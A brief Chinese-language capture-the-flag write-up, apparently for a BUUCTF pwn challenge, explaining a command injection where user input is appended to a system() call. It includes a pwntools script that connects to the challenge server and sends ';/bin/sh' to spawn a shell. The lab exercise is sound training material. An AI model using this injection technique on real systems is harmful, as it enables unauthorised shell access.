首先查看一下文件的保护措施
在用ida打开看一下
这里就是一个menu,然后进行选择,进入不同的函数
这里主要注意到进入case1时,这里直接就有一个system函数,那么是否可以直接通过这个函数获得shell呢
在看看这里通过read函数向buf进行输入,在用strcat函数将输入到buf的字符串拼接到dest后面,那这里就可以直接输入/bin/sh了
但是要注意要加上一个 " ; ",这样就能在system函数中执行多个命令,才能执行/bin/sh
点击查看代码
from pwn import *
io=remote("node5.buuoj.cn",25108)
io.sendlineafter(b"choose:","1")
io.sendlineafter(b"address:",";/bin/sh")
io.interactive()